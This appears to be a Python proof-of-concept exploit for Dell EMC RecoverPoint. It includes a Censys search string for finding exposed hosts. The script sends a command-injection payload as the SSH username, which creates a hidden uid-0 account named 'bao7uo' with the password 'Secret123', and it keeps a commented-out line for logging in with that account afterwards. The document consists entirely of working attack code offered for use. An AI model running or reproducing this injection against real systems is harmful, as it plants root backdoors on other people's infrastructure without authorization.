Dell EMC Recoverpoint PoC Exploit

1. #!/usr/bin/python
2. # Dell EMC Recoverpoint Single-Host Code Injection PoC Creds to LiGhT
3. # censys dork: ((RecoverPoint) AND protocols.raw: "22/ssh") AND protocols.raw: "22/ssh"
4. import sys, re, os, paramiko, time
5.  
6. paramiko.util.log_to_file("/dev/null")
7. def main():
8.         try:
9.                 ip = raw_input("IP: ")
10.                 username = "$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)"
11.                 u1 = "bao7uo"
12.                 u2 = "Secret123"
13.                 port = 22
14.                 ssh = paramiko.SSHClient()
15.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
16.                 print "Connecting to "+ip+" USER-EXPLOIT "+username
17.                 ssh.connect(ip, port = port, username=username, timeout=3)
18.                 ssh.close()
19.                 #ssh.connect(ip, port = port, username=u1, password=u2, timeout=3)
20.                 #print "ho"
21.         except:
22.                 pass
23.  
24. main()